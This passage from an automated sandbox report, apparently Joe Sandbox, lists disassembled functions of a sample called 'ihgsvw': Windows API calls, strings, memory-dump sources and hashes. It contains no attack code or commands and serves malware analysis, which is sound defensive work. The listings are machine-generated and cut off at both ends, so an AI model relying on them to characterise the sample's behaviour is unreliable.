                • Instruction Fuzzy Hash: 04415175A10219DFCF00DFA4D848AEEBBB9FF48344F118469E956A7261C730EA45CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BA2441: GetWindowLongW.USER32(00000000,000000EB), ref: 00BA2452
                • GetSystemMetrics.USER32 ref: 00C3A926
                • GetSystemMetrics.USER32 ref: 00C3A946
                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C3AB83
                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C3ABA1
                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C3ABC2
                • ShowWindow.USER32(00000003,00000000), ref: 00C3ABE1
                • InvalidateRect.USER32(?,00000000,00000001), ref: 00C3AC06
                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00C3AC29
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                • String ID:
                • API String ID: 1211466189-3916222277
                • Opcode ID: 8e52320d200d17a11e0a8b5b99854d2df094e833cc0931e3e995e7170cb96561
                • Instruction ID: f392fc4cd7ee2479a7dcb8978e12cf57b043f23b5dcbda609d231d1666ca80e6
                • Opcode Fuzzy Hash: 8e52320d200d17a11e0a8b5b99854d2df094e833cc0931e3e995e7170cb96561
                • Instruction Fuzzy Hash: 90B1AB31610219DFDF14CF69C985BAE7BF2FF44705F088069EC999B295D730AAA0CB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLocalTime.KERNEL32(?), ref: 00C18BB1
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C18BC1
                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C18BCD
                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C18C6A
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18C7E
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18CB0
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C18CE6
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18CEF
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CurrentDirectoryTime$File$Local$System
                • String ID: *.*
                • API String ID: 1464919966-438819550
                • Opcode ID: dedf1d8dcbcbd1970e5d5aeb0c716e306aa9e68c7fec0d6ca4d76fa56e2b4d11
                • Instruction ID: 455e06c4a0e1d47454b01f2aa3778db202ada6073635a88a5efe3c334abd6b11
                • Opcode Fuzzy Hash: dedf1d8dcbcbd1970e5d5aeb0c716e306aa9e68c7fec0d6ca4d76fa56e2b4d11
                • Instruction Fuzzy Hash: 206139B25083459FC710EF24C844A9FB7E8FF8A310F04895DF99997251DB31EA89CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                • String ID: 0$F
                • API String ID: 161812096-3044882817
                • Opcode ID: 6a013c574b63808959320951859aca4ed40d4b11b2aba7df402961ae0a78843a
                • Instruction ID: 13ac076b6c08b275b2eaa2550e26a00e01f463c7e266787cb7d093cfa20011f1
                • Opcode Fuzzy Hash: 6a013c574b63808959320951859aca4ed40d4b11b2aba7df402961ae0a78843a
                • Instruction Fuzzy Hash: E6414AB5611209EFDB18CF64E855BAE7BB5FF4A314F140028FA5697350D730AA20CF50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                  • Part of subcall function 00C04536: GetClassNameW.USER32 ref: 00C04559
                • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00C027F4
                • GetDlgCtrlID.USER32 ref: 00C027FF
                • GetParent.USER32 ref: 00C0281B
                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C0281E
                • GetDlgCtrlID.USER32 ref: 00C02827
                • GetParent.USER32(?), ref: 00C0283B
                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C0283E
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: MessageSend$CtrlParent$ClassName_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 711023334-1403004172
                • Opcode ID: d33b9b98ed6fde31d4612405e7e18a8c8105e7952a58bb2db33828fa3d78988f
                • Instruction ID: 98f16e7b497b8d341a47e9a17cba6fcd2885ebd78fee3e6c58873e2202cfedc7
                • Opcode Fuzzy Hash: d33b9b98ed6fde31d4612405e7e18a8c8105e7952a58bb2db33828fa3d78988f
                • Instruction Fuzzy Hash: 0821C275900118BBCF15AFA0DC85FEEBBB5EF06310B004256B961A72E6CB744904DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                  • Part of subcall function 00C04536: GetClassNameW.USER32 ref: 00C04559
                • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00C028D3
                • GetDlgCtrlID.USER32 ref: 00C028DE
                • GetParent.USER32 ref: 00C028FA
                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C028FD
                • GetDlgCtrlID.USER32 ref: 00C02906
                • GetParent.USER32(?), ref: 00C0291A
                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C0291D
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: MessageSend$CtrlParent$ClassName_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 711023334-1403004172
                • Opcode ID: 368c3b00ec64f114425b3a954a26d169dda620cada4e18830ba95d4071a9bf92
                • Instruction ID: 476c72eb214ed4def62f57122a66c0f87e5ec6fd305fe48f46e3481cc44fe8df
                • Opcode Fuzzy Hash: 368c3b00ec64f114425b3a954a26d169dda620cada4e18830ba95d4071a9bf92
                • Instruction Fuzzy Hash: 3821F675D00118BBCF11AFA0DC85FEEBBB8EF05300F004556BAA1A31D6D7784948DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C343FC
                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C343FF
                • GetWindowLongW.USER32(?,000000F0), ref: 00C34426
                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C34449
                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C344C1
                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00C3450B
                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00C34526
                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00C34541
                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00C34555
                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00C34572
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: MessageSend$LongWindow
                • String ID:
                • API String ID: 312131281-0
                • Opcode ID: f3eb0bc0161662a7b38a7d69b8fe25c44d771616aeff2822e8a0a546786b3115
                • Instruction ID: c309b478801a44fa7668b452b80d0801b92d7ac740e14cfb86d783482c343bed
                • Opcode Fuzzy Hash: f3eb0bc0161662a7b38a7d69b8fe25c44d771616aeff2822e8a0a546786b3115
                • Instruction Fuzzy Hash: 6C617A75900208AFDB15DFA8CC81FEE77F8EB09310F1441A9FA15A72A1C774AA85DF50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _free.LIBCMT ref: 00BD3024
                  • Part of subcall function 00BD2D58: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDDB71,00C71DC4,00000000,00C71DC4,00000000,?,00BDDB98,00C71DC4,00000007,00C71DC4,?,00BDDF95,00C71DC4), ref: 00BD2D6E
                  • Part of subcall function 00BD2D58: GetLastError.KERNEL32(00C71DC4,?,00BDDB71,00C71DC4,00000000,00C71DC4,00000000,?,00BDDB98,00C71DC4,00000007,00C71DC4,?,00BDDF95,00C71DC4,00C71DC4), ref: 00BD2D80
                • _free.LIBCMT ref: 00BD3030
                • _free.LIBCMT ref: 00BD303B
                • _free.LIBCMT ref: 00BD3046
                • _free.LIBCMT ref: 00BD3051
                • _free.LIBCMT ref: 00BD305C
                • _free.LIBCMT ref: 00BD3067
                • _free.LIBCMT ref: 00BD3072
                • _free.LIBCMT ref: 00BD307D
                • _free.LIBCMT ref: 00BD308B
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 2c67850dae19c95b29d816e6a36ffe0726b2df2064fe3e873c70606a085126a8
                • Instruction ID: b3b78f315ea26e34040b385b0f0119dd910ef7cd38e7f780783dadded9ebcf6f
                • Opcode Fuzzy Hash: 2c67850dae19c95b29d816e6a36ffe0726b2df2064fe3e873c70606a085126a8
                • Instruction Fuzzy Hash: BD117776500188BFCB01EF54C842CDD7FA6EF16350B9141A6B91C9B232EA71DE919F80
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetWindowLongW.USER32 ref: 00BA7387
                  • Part of subcall function 00BA7417: GetClientRect.USER32 ref: 00BA743D
                  • Part of subcall function 00BA7417: GetWindowRect.USER32 ref: 00BA747E
                  • Part of subcall function 00BA7417: ScreenToClient.USER32 ref: 00BA74A6
                • GetDC.USER32 ref: 00BE6045
                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BE6058
                • SelectObject.GDI32(00000000,00000000), ref: 00BE6066
                • SelectObject.GDI32(00000000,00000000), ref: 00BE607B
                • ReleaseDC.USER32 ref: 00BE6083
                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00BE6114
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                • String ID: U
                • API String ID: 4009187628-3372436214
                • Opcode ID: f3a9080fdc913c5e01af0e01487bdd4cf5a8d2522beedb4bcce4b1e9708196ed
                • Instruction ID: da65235ccc1418bcf5fb678ca204e4f066b62fea5a5ea16ffe364640db7d7b63
                • Opcode Fuzzy Hash: f3a9080fdc913c5e01af0e01487bdd4cf5a8d2522beedb4bcce4b1e9708196ed
                • Instruction Fuzzy Hash: 6A710131408245DFCF218F24CCC4AAA3BF1FF593A5F2442EAED565A1A7C7318842EB51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00BE5437,?,?,Bad directive syntax error,00C3DCD0,00000000,00000010,?,?), ref: 00C0A14B
                • LoadStringW.USER32(00000000,?,00BE5437,?), ref: 00C0A152
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C0A216
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: HandleLoadMessageModuleString_wcslen
                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                • API String ID: 858772685-4153970271
                • Opcode ID: f680b9ca024562c418e8d4dd206b7aee8763549042576e3c1717c7ce756a81cf
                • Instruction ID: 2e7bb47b9525db039bd30ed022a532b64aeef34332cd102fb225d27a4c5ce184
                • Opcode Fuzzy Hash: f680b9ca024562c418e8d4dd206b7aee8763549042576e3c1717c7ce756a81cf
                • Instruction Fuzzy Hash: 98215C7181431EABCF11AF90CC4AEFE77B9BF29304F0448A6B515660A2DA759A28DB11
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetParent.USER32 ref: 00C0293B
                • GetClassNameW.USER32 ref: 00C02950
                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C029DD
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ClassMessageNameParentSend
                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                • API String ID: 1290815626-3381328864
                • Opcode ID: 803759a6a10d24b4b7dcfd693be5e5dbf1fb26ed670e781e5f19243a596619f0
                • Instruction ID: d26c885ac200065cc989e09895eec9e96639bd4b15a0a8814ae5bd1c5eb33b2f
                • Opcode Fuzzy Hash: 803759a6a10d24b4b7dcfd693be5e5dbf1fb26ed670e781e5f19243a596619f0
                • Instruction Fuzzy Hash: FE11C276288306BAFE103621EC1BEFA77EC9F15724F200176FA01E50D1EBA16A81A554
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                • String ID:
                • API String ID: 1282221369-0
                • Opcode ID: 2f277a64dcef802d303fb9d5d906186cf59152e3860d7f98bf004fcf1354749e
                • Instruction ID: 51d22475ddcd6b51e28b5c5960b41704a0c159f951fd2f6954f0774a2b74a8bc
                • Opcode Fuzzy Hash: 2f277a64dcef802d303fb9d5d906186cf59152e3860d7f98bf004fcf1354749e
                • Instruction Fuzzy Hash: 2761F771900245AFDB25AFA8D881B6DFBE4DF12320F1502EFFD8997385F67199408B91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadImageW.USER32 ref: 00BE28F1
                • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00BE290A
                • LoadImageW.USER32 ref: 00BE291A
                • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00BE2932
                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BE2953
                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BA11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00BE2962
                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BE297F
                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BA11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00BE298E
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Icon$DestroyExtractImageLoadMessageSend
                • String ID:
                • API String ID: 1268354404-0
                • Opcode ID: a112aa0cb084a8f4fb02190582bc966a18621469fc8b57b9eb02999a307bc0e8
                • Instruction ID: e5195884197abcffc3520436227d38c24b9299fa9eaf82734231f5c686a7e094
                • Opcode Fuzzy Hash: a112aa0cb084a8f4fb02190582bc966a18621469fc8b57b9eb02999a307bc0e8
                • Instruction Fuzzy Hash: FF516974600209AFDB20CF2ACC85BAA7BF9EF49750F144968F956972A0DB70E990DF50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C1CADF
                • GetLastError.KERNEL32 ref: 00C1CAF2
                • SetEvent.KERNEL32(?), ref: 00C1CB06
                  • Part of subcall function 00C1CBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C1CBCF
                  • Part of subcall function 00C1CBB0: GetLastError.KERNEL32 ref: 00C1CC7F
                  • Part of subcall function 00C1CBB0: SetEvent.KERNEL32(?), ref: 00C1CC93
                  • Part of subcall function 00C1CBB0: InternetCloseHandle.WININET(00000000), ref: 00C1CC9E
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                • String ID:
                • API String ID: 337547030-0
                • Opcode ID: e52394af5cc321ff28f30799a854beb75a58ec64206e6661b8334f19f2c18146
                • Instruction ID: 49f74d19d7a9f34a00d379cff3be1656b914fdf085318861c76eb87be787cf89
                • Opcode Fuzzy Hash: e52394af5cc321ff28f30799a854beb75a58ec64206e6661b8334f19f2c18146
                • Instruction Fuzzy Hash: A8316AB1248705AFDB219F71DD85BABBBF8FF4A300B14451DF866C2610D731E994ABA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C01CD9,?,?,00000000), ref: 00C0209C
                • HeapAlloc.KERNEL32(00000000,?,00C01CD9,?,?,00000000), ref: 00C020A3
                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C01CD9,?,?,00000000), ref: 00C020B8
                • GetCurrentProcess.KERNEL32(?,00000000,?,00C01CD9,?,?,00000000), ref: 00C020C0
                • DuplicateHandle.KERNEL32(00000000,?,00C01CD9,?,?,00000000), ref: 00C020C3
                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C01CD9,?,?,00000000), ref: 00C020D3
                • GetCurrentProcess.KERNEL32(00C01CD9,00000000,?,00C01CD9,?,?,00000000), ref: 00C020DB
                • DuplicateHandle.KERNEL32(00000000,?,00C01CD9,?,?,00000000), ref: 00C020DE
                • CreateThread.KERNEL32(00000000,00000000,00C02104,00000000,00000000,00000000), ref: 00C020F8
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                • String ID:
                • API String ID: 1957940570-0
                • Opcode ID: ac298fb0c7c9f09e0562fc83a3282b1b670ead2c45842b53f4a28bbaa6dc87ff
                • Instruction ID: 7320aaf073ef8857198aa8c8dd88955a9a2acea78098e081b9cb518f2d6c30e0
